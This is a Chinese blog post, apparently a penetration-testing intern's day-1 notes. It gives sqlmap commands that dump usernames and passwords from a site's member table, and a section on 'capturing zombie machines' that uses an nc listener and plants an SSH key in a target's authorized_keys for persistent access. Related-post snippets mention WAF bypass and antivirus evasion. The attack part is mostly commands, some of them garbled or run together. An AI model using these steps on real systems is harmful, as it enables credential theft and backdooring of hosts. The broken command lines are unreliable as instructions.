渗透测试实习日记day1

最新推荐文章于 2024-03-03 21:50:47 发布
最新推荐文章于 2024-03-03 21:50:47 发布
阅读量986 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43173059/article/details/115693652
版权

渗透测试实习日记day1

一、sqlmap爆破网站?

得到表

sqlmap -u “含注入点网址” --batch --tables --random-agent

得到列

sqlmap -u “含注入点网址” --batch --columns -T “member” --random-agent

得到字段名

sqlmap -u “含注入点网址” --batch --dump -C “m_username,m_userpass” -T “member”–random-agent

二、抓肉鸡

所用工具burpsuite

1.开启一个终端:远程登录
在这里插入图片描述
2. nc -l 9999
根据burpsuite抓包,写入完成后,渗透目标网站
(端口号9999)
3.
ls -a
cd .ssh
ls
cat id_rsa.pub>>authorized_keys
cat authorized_keyscd
.pub写入 echo ‘秘钥’>>authorized_keys
cat authorized_keys
4.
在另一终端:
ssh-keygen -t rsa
authorized_keys
cat authorized_keys
连接

{米泥}
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Day07实习日记1
08-08
Day07实习日记1
渗透学习日记day5
qq_44836237的博客
11-11 1646
继昨天内容,除了超长字符绕过还有一种就进行分块传输。 大概就是因为文件传输过程中文件若是比较大,会将它分片,每一块有固定字节的长度,到服务器后再重新组合起来,这也是一种过WAF的思路。 关于免杀 1.静态扫描 xx.exe的文件没有运行时进行扫描 2.动态行为扫描 xx.exe文件running时远程控制 做一些可疑行为(修改注册表,添加启动项) powershell:最大特点白名单,直接在内存中执行,文件不落地 ...
渗透测试第一周总结
最新发布
weixin_63650919的博客
03-03 356
渗透测试】web日志、linux命令、常用知识
一个努力生活的人的博客
05-18 1047
渗透测试】web日志、linux命令、常用知识
Day03实习日记1
08-08
Day03实习日记1
Day05实习日记1
08-08
Day05实习日记1
测试周报、日报模板
08-16
测试人员使用,周报、日报模板
网络渗透实训周课堂笔记
m0_67348601的博客
04-05 457
1. Nmap的基本 Nmap + ip 6+ ip Nmap -A 开启操作系统识别和版本识别功能 – T(0-6档) 设置扫描的速度 一般设置T4 过快容易被发现 -v 显示信息的级别,-vv显示更详细的信息 192.168.1.1/24 扫描C段 192.168.11 -254 =上 nmap -A -T4 -v -iL ~/targets.txt (iL表示要扫描的目标位于一个文档中) --------------- 192.168.1.1/24 --exc...
网络渗透测试实训周笔记3.0
m0_65456462的博客
03-27 4578
1.代码审计概念 代码审计,是对应用程序源代码进行系统性检查的工作。目的是为了找到并且修复应用程序在开发阶段存在的一些漏洞或者程序逻辑错误,避免程序漏洞被非法利用给企业带来不必要的风险。 代码审计不是简单的检查代码,审计代码的原因是确保代码能安全的做到对信息和资源进行足够的保护,所以熟悉整个应用程序的业务流程对于控制潜在的风险是非常重要的。 代码审计入门基础:html/js基础语法、PHP基础语法 ,面向对象思想,PHP小项目开发(Blog、注册登录、表单、文件上传、留言板等),Web漏洞挖掘及利用,W
工作记录——渗透测试
qq_43638123的博客
06-13 2555
实习已经一个月了,对接触的一些渗透测试项目做一下记录,同时也是希望看到的大佬们对我的不足提出意见。 项目一:公安局项目 外网 B/S架构 web端渗透 这是awvs的扫描截图 漏洞名称 数据明文传输 风险等级 中风险 渗透过程 在登录时进行抓包,发现用户名和密码以明文的形式进行传输。如下图所示: 漏洞危害 明文传输一般存在于web网站登录页面,密码明文传输容易被嗅探软件截取破解。 修复建议 建议按照网站的加密等级要求,需要对密码传输过程中进行加密传输。如采取MD5加验或SM1、S
项目实习(五)网络渗透实验
eck_777的博客
09-26 6780
这是大学期间进行的生产实习内容,主要是进行一次简单的网络渗透测试。 实习的目的及任务 实习的目的 生产实习是实现理论知识和实践相结合的重要环节。通过实习,学生将对于课堂学习的基础和专业理论知识有更深入的掌握。特别是对信息安全技术与工程的最新发展和应用有较深入的了解。同时通过生产实习,进一步锻炼学生理论与实践相结合的能力,提高学习的主动性,为毕业后的社会工作打下良好的基础。 实习任务要求 (1)严...
渗透测试xss测试语句
07-14
console.log输出语句,不能绕WAF
Day11实习日记1
08-08
Day11实习日记1
渗透测试总结
qq_36386435的博客
02-26 5097
前序 我觉得渗透测试有点像机械化的过程,遇到一个目标时,就要按照某个流程都走一遍,工具什么的都用上,当都弄完还没有思路,就需要有些其他的思想了,我想先大致总结一波这个机械化的流程该怎么走,然后收集一些好的渗透思路,学习别人的渗透路径,而前面那个机械化流程是肯定必须要走的。 要干什么? 主要还是在这个渗透测试流程里面总结一些外围打点经历的流程和需要使用的工具,以及优质的博客教程,这还是很重要的,我就不专门一个工具专题来阐述,一些比较大型的非常好用的工具,我会另外开启page来记述,完全就是为了提升我的渗透
渗透工程师日常探测漏洞全流程 初学者必看
Y525698136的博客
05-27 103
相信大家对网络安全中的渗透测试都或多或少听说过吧,渗透测试对于网络安全来说是十分重要的,简单来说,就是对网站和服务器进行安全检测,渗透工程师通过合法的授权模拟不法分子的手段,来检测我们的网站及服务器是否存在漏洞,那具体流程是怎样的呢?
渗透测试员完整职业指南
xnxqwzy的博客
07-31 213
渗透测试人员/道德黑客是信息安全领域的私家侦探。与许多 PI操作一样,任务是在任何潜在的入侵操作员有机会实施他们的计划之前发现威胁。一般来说,人性的基本真理之一,特别是数字信息系统,是声名狼藉的行为者总是试图抓住机会利用漏洞。渗透测试人员寻求调查、发现和帮助修复有线和无线网络系统以及基于Web 的应用程序中的任何潜在漏洞。道德黑客的先发制人的工作与现实生活中黑客的努力之间的推拉是一场持续的军备竞赛。每一方都坚持不懈地尝试将他们的知识、技能和技术提升到超出对方能力的范围。
Metasploit渗透日记(三)
kopi_luwak的博客
07-15 173
情报搜集——漏洞扫描 项目简介 1、 OpenVAS简介 2、 OpneVAS的安装 3、 OpenVAS的使用 项目要求 硬件要求: 1、 Kali Linux系统的电脑一台 2、 局域网内的任何系统的PC,数量不限。 软件要求:(以下软件需要手动安装) 1、 OpnVAS 项目步骤 1、 OpenVAS简介 OpenVAS是一款类似与Nessus的综合性漏洞扫描器,主要用来识别远程主机、寻找主...
渗透日记-POST注入
weixin_30394633的博客
08-20 235
今晚给一个网站做了一次入侵检测,首先进行信息刺探后,发现这个站有注入策略,所有页面都没法通过常规的注入,利用wvs扫描网站发现一个页面。 这个页面直接暴露出了错误信息,看了一下url没有参数却爆出了错误,感觉post能注入,于是抓包修改header分析了一下 Request POST /medresult.php HTTP/1.1 Content-Length: 28 Con...
菜鸡的渗透日记
合天网安学院
06-19 341
Fofa上找了个站,未授权,所以下文图片打码????漏洞url为:http://ip:port/1. 弱口令登录由于一个后台弱口令,才有了下面的渗透过程.试了个弱口令,admin,123...
性能测试 day05
07-29
1. 负载测试:通过模拟并发用户访问系统,评估系统在高负载情况下的性能表现。可以使用负载测试工具(如JMeter、LoadRunner等)来模拟并发用户,并收集关键性能指标(如响应时间、吞吐量等)。 2. 压力测试:通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值